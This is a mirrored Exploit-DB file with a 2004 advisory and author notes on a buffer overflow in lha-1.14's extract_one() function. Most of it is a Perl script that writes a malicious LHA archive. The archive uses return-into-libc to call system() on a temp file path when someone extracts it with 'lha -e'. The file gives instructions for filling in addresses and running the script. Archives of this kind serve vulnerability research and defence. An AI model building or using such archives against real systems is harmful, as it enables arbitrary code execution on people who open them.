bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/remote/24120.c
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

128 lines
No EOL
7.7 KiB
C
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/10354/info
LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files.
These issues might allow an attacker to execute code in the context of a user invoking the affected utility.
Exploiting lha-1.14 (after security advisories)
19 May, 2004
Copyright (2004) Lukasz Wojtow <lw@wszia.edu.pl>
At the time of writing this text, some vulnerabilities have been discovered
and fixed, but not all (i've sent info to major linux distributions and
Bugtraq, but they didn't seem to bother).
This code creates an archive, which decompressed with lha-1.14
will cause a buffer overflow. The bug is in function extract_one (there are a
lot of bugs, actually). At first it looked like like a typical stack overflow,
but after a couple of thoughts it was obvious that returnig on the stack was
impossible (due to special 0xff handling). The only option came to my mind
was return-into-libc.
Addresses inside this code do system("/tmp/lhXXXXXX") and exit().
Before exploiting 3 addresses have to be obtained:
- system function,
- exit function (not really needed, but SEGFAULT could be noticed),
- address of /tmp/lhXXXXXX inside exploitet binary.
Put these addresses into their place in the code (in little endian order
on x86) and run:
./code > archive.lhz
then command
lha -e archive.lhz
will cause execution of /tmp/lhXXXXXX
Enjoy
---CODE START---
#!/usr/bin/perl
my $exit_addr= "\x50\xf2\x4\x40";
my $system_addr= "\x30\x65\x6\x40";
my $tmp_string= "\xfa\x1e\x5\x8";
print "\x19\x8d\x2d\x6c\x68\x64\x2d\x18\x0\x0\x0\x0\x0\x0\x0\xe1\xa5".
"\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0".
"\x0\x0\x5\x0\x2\x46\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xde".
"\x2d\x6c\x68\x64\x2d\x69\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20".
"\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\x56\x0\x2".
"\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x2f\x2d\x6c\x68".
"\x64\x2d\xba\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0".
"\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xa7\x0\x2\x46\xff\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x81\x2d\x6c\x68\x64\x2d".
"\xb\x1\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0".
"\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xf8\x0\x2\x46\xff\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
"\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xff\x2d\x6c\x68\x64\x2d\x48".
"\x1\x0\x0\x0\x0\x0\x0\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50".
"\xed\x41\x7\x0\x51\x0\x0\x0\x0\x35\x1\x2\x46\xff\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x7\x0\x54\xaf\x68".
"\xaa\x40\x0\x0\x19\x10\x2d\x6c\x68\x64\x2d\x59\x1\x0\x0\x0\x0\x0\x0".
"\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0".
"\x0\x0\x0\x46\x1\x2\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\xff\x41\x41\x41\x41".
$system_addr. $exit_addr. $tmp_string.
"\xff\x7\x0\x54\xaf\x68\xaa\x40\x0\x0\x0";
---CODE END---
Reference in a new issue View git blame Copy permalink